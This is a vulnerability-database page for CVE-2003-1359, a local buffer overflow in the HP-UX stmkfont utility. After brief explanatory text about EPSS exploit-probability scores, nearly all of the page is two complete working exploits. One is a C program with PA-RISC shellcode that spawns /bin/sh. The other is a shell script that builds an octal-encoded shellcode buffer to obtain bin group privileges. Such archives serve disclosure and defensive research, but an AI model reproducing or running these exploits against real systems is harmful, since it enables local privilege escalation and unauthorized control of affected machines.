CVE-2003-1359 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/6836/info A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option. A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges. All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable. /*## copyright LAST STAGE OF DELIRIUM jun 2002 poland *://lsd-pl.net/ #*/ /*## /usr/bin/stmkfont #*/ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #define ADRNUM 1200 #define NOPNUM 12000 #define PADNUM 3 char shellcode[]= "\xeb\x5f\x1f\xfd" /* bl .+8,%r26 */ "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */ "\xb7\x5a\x40\x22" /* addi,< 0x11,%r26,%r26 */ "\x0f\x40\x12\x0e" /* stbs %r0,7(%r26) */ "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */ "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */ "\xb4\x16\x70\x16" /* addi,> 0xb,%r0,%r22 */ "/bin/sh" ; char jump[]= "\xe0\x40\x00\x00" /* be 0x0(%sr0,%rp) */ "\x37\xdc\x00\x00" /* copy %sp,%ret0 */ ; char nop[]="\x0a\xb5\x02\x95"; int main(int argc,char **argv){ char buffer[20000],adr[4],*b,*envp[2]; int i; printf("copyright LAST STAGE OF DELIRIUM jun 2002 poland //lsd-pl.net/\n"); printf("/usr/bin/stmkfont for HP-UX 10.20 700/800\n"); *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-16732; printf("0x%x\n",*((unsigned long*)adr)); envp[0]=&buffer[2000]; envp[1]=0; b=buffer; for(i=0;i<PADNUM;i++) *b++=0x61; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; *b=0; b=&buffer[2000]; strcpy(b,"lsd=");b+=4; for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; *b=0; execle("/usr/bin/stmkfont","lsd",buffer,0,envp); }

source: https://www.securityfocus.com/bid/6836/info A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option. A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges. All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable. #!/bin/sh # File : ex_stmkfont.sh # Exploit for command stmkfont of HPUX to get bin gid BUFF. # * Usage: chmod +x ex_stmkfont.sh ; ./ex_stmkfont.sh # Write by [email protected] 2003-2-20 # Site : www.xfocus.org www.xfocus.net NOP_LEN=65 ADDR_LEN=5000 BUFF="";i=0 while [ $i -ne $NOP_LEN ] ; do BUFF=$BUFF'\0013\0071\0002\0231' ; i=$(($i+1)) done BUFF=$BUFF'\0013\0071\0002\0127\0052\0344\0227\0020\0050\0073\0160\0357\0010\0067\0002\0103' BUFF=$BUFF'\0266\0372\0100\0004\0266\0371\0100\0004\0266\0370\0100\0004\0344\0140\0340\0010' BUFF=$BUFF'\0266\0366\0100\0376\0013\0071\0002\0231\0053\0044\0227\0020\0050\0073\0160\0357' BUFF=$BUFF'\0353\0137\0037\0375\0013\0071\0002\0231\0267\0132\0100\0042\0017\0100\0022\0016' BUFF=$BUFF'\0010\0071\0002\0103\0344\0140\0340\0010\0264\0026\0160\0026/bin/shX' i=0; while [ $i -ne $ADDR_LEN ] ; do BUFF=$BUFF'\0177\0177\0001\0020'; i=$(($i+1)) done STR=`/bin/echo "${BUFF}"` /usr/bin/stmkfont -d1 x -d2 $STR x #EOF